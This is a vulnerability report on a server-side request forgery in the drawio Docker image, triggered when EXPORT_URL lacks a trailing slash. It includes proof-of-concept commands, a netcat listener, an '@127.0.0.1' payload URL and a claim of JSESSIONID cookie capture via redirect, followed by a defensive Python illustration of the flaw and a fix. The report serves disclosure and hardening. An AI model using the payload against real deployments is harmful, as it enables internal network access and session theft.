The problem came from this line of code.

I ran docker-drawio with the following command:

docker run -it --rm --name="draw" -e EXPORT_URL=http://somesite.com -p 8080:8080 -p 8443:8443 jgraph/drawio

If the drawio EXPORT_URL is set to an address without any / after the primary hostname, like http://somesite.com (not like http://somesite.com/something or http://somesite.com/), then an attacker can send a request to 127.0.0.1:4431 with a payload like http://draio-instance/service/0/@127.0.0.1:4431

docker run -it --rm --name="draw" -e EXPORT_URL=http://google.com -p 8080:8080 -p 8443:8443 jgraph/drawio

and then docker ps and get the drawio hash name (called HN):

docker exec -it HN /bin/bash
apt update && apt install netcat && netcat -l 4430

http://draio-instance:8080/service/0/@127.0.0.1:4431

It is a full SSRF. If you need another PoC I can give you an HTTP logger script that returns some things to the attacker.

Also, I don't know what exactly the JSESSIONID cookie is, but I can receive its content at my public IP after a redirect too!
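The trailing-slash condition in the report is what you would expect if the proxy forms the upstream URL by appending the user-controlled remainder of the path to EXPORT_URL: with a bare authority, a leading "@" turns the configured hostname into userinfo and the attacker's host:port into the real target. The following is an added illustration, not drawio's code; the concatenation in naive_build is an assumption about the proxy, and the hostname and suffix are constructed from the values in the report. It shows the host a client would actually connect to in both configurations, and a hardened builder that normalises a bare authority and re-parses the result to verify the authority has not changed.

```python
from urllib.parse import urlsplit

# Constructed values mirroring the report: the configured backend and the
# attacker-controlled remainder of the request path after /service/0/.
EXPORT_URL = "http://somesite.com"
SUFFIX = "@127.0.0.1:4431"


def naive_build(export_url: str, suffix: str) -> str:
    """Assumed proxy behaviour (not verified against drawio): plain concatenation."""
    return export_url + suffix


def upstream_authority(url: str) -> tuple:
    """(hostname, port) an HTTP client would connect to for this URL.
    Anything before a '@' in the authority is userinfo, not the host."""
    p = urlsplit(url)
    return (p.hostname, p.port)


def authority_unchanged(export_url: str, candidate: str) -> bool:
    """True only if candidate still targets the configured scheme/host/port
    and picked up no userinfo along the way."""
    base, cand = urlsplit(export_url), urlsplit(candidate)
    if cand.username is not None or cand.password is not None:
        return False
    return (cand.scheme, cand.hostname, cand.port) == (base.scheme, base.hostname, base.port)


def safe_build(export_url: str, suffix: str) -> str:
    """Hardened builder: a bare authority gets a trailing '/', so user input can
    only ever extend the path; the result is then re-parsed and verified."""
    if not urlsplit(export_url).path:
        export_url += "/"
    candidate = export_url + suffix
    if not authority_unchanged(export_url, candidate):
        raise ValueError("upstream authority changed: " + candidate)
    return candidate


if __name__ == "__main__":
    print(upstream_authority(naive_build(EXPORT_URL, SUFFIX)))        # ('127.0.0.1', 4431)
    print(upstream_authority(naive_build(EXPORT_URL + "/", SUFFIX)))  # ('somesite.com', None)
    print(safe_build(EXPORT_URL, SUFFIX))                             # http://somesite.com/@127.0.0.1:4431
```

The same re-parse check is worth applying on any redirect the upstream returns, since the report notes session data also reached an external address after a redirect.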